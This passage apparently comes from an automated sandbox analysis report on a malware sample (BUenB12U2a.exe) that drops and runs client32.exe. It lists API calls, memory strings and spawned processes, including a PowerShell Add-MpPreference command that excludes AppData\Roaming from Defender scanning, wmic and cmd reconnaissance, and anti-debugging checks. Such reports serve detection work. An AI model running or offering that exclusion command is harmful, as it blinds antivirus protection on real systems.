                                Source: client32.exe, 00000006.00000002.3577653311.000000006C9CD000.00000002.00000001.01000000.0000001B.sdmpBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: client32.exe, 00000006.00000002.3574007074.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3574538256.000000000138D000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000003.2099393814.000000000138D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: BUenB12U2a.exe, 00000001.00000003.2027919683.0000020E47317000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2012396831.0000020E47315000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2019096673.0000020E47317000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1750148610.0000020E47300000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1748207345.0000020E47300000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2007706350.0000020E47314000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2006900067.0000020E472C9000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.2023177526.0000020E47317000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1749155705.0000020E47300000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000009.00000003.1880304572.000000000067D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess information queried: ProcessInformation
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA2A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF76CA2A684
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_10702410 CreateEventA,GetLastError,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,GetVersionExA,wsprintfA,wsprintfA,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,6_2_10702410
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC06C74 VirtualProtect ?,-00000001,00000104,?6_2_6CC06C74
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_1070CC8F LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_1070CC8F
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA334F0 GetProcessHeap,0_2_00007FF76CA334F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA2A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF76CA2A684
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF76CA1C910
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF76CA1D19C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA1D37C SetUnhandledExceptionFilter,0_2_00007FF76CA1D37C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA2A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF76CA2A684
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF76CA1C910
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF76CA1D19C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA1D37C SetUnhandledExceptionFilter,1_2_00007FF76CA1D37C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA92A7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FFDFAA92A7C
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFAA93034 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFAA93034
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB0B2126 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFB0B2126
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7FB20C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FFDFB7FB20C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9B5E25 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_6C9B5E25
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C9AFF11 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_6C9AFF11
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC0ADFC _crt_debugger_hook,_memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,6_2_6CC0ADFC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB90807 __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6CB90807
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC0C16F __report_gsfailure,IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,6_2_6CC0C16F
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCCAFF0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,6_2_6CCCAFF0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC6E9C0 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_6CC6E9C0

                                HIPS / PFW / Operating System Protection Evasion

                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6C999500 LogonUserA,ImpersonateLoggedOnUser,GetProcAddress,GetProcAddress,GetProcAddress,GetLastError,GetLastError,GetLastError,GetDesktopWindow,SetLastError,SetLastError,SetLastError,GetLastError,GetProcAddress,SetLastError,LoadLibraryA,GetProcAddress,GetDesktopWindow,FreeLibrary,wsprintfA,RevertToSelf,CloseHandle,6_2_6C999500
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC66790 keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,keybd_event,6_2_6CC66790
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Users\user\Desktop\BUenB12U2a.exe "C:\Users\user\Desktop\BUenB12U2a.exe"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\extracted\client32.exe C:\Users\user\AppData\Roaming\extracted\client32.exe
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCD5490 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_6CCD5490
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCD5C10 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,6_2_6CCD5C10
                                Source: client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: lProgman|
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: Shell_TrayWnd
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exeBinary or memory string: Progman
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: Shell_TrayWndTraceRunpluginTimeoutP$
                                Source: BUenB12U2a.exe, 00000001.00000003.1793467540.0000020E48041000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000003.1794062717.0000020E48848000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman|
                                Source: client32.exe, 00000006.00000002.3578189072.000000006CDBE000.00000002.00000001.01000000.00000017.sdmp, client32.exe, 00000009.00000002.1882182203.000000006CDBE000.00000002.00000001.01000000.00000017.sdmpBinary or memory string: lProgman
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA395E0 cpuid 0_2_00007FF76CA395E0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: GetLocaleInfoW,GetLocaleInfoW,1_2_00007FFDFB773440
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: GetLocaleInfoW,1_2_00007FFDFB7873A0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B4E7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B4E8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B14A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,6_2_1070E5F1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,6_2_1070B6DC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,MultiByteToWideChar,6_2_1070E6AE
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,6_2_1070AF75
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,6_2_1070E704
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_1070B3D5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,WideCharToMultiByte,6_2_1070E7C7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C9BF80C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_6C9BF848
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6C9BF48D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_6C9BF4E8
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_6C9BF6B9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: EnumSystemLocalesA,6_2_6C9BF781
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6C9BF7A5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_6C9CB1AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_6C9CB286
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoA, 6_2_6C9CB2C9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_6C9BF2F1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 6_2_6C9BF3E6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson, 6_2_6CB9888A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson, 6_2_6CB98468
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP, 6_2_6CB985AC
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno, 6_2_6CB965F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s, 6_2_6CB986FD
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc, 6_2_6CB9871C
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_6CC0F42E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 6_2_6CC0F0DB
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp, 6_2_6CC0F034
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage, 6_2_6CC0F136
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_6CC0F3C7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage, 6_2_6CC0F307
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 6_2_6CD9F4F6
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoA, 6_2_6CD96D4E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_6CD9EFCB
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\PIL VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\certifi VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info\licenses VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\cryptography-44.0.0.dist-info VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\ucrtbase.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\_ctypes.pyd VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962 VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-console-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-datetime-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-fibers-l1-1-1.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\api-ms-win-core-file-l1-1-0.dll VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\Desktop\BUenB12U2a.exe VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI69962\base_library.zip VolumeInformationJump to behavior
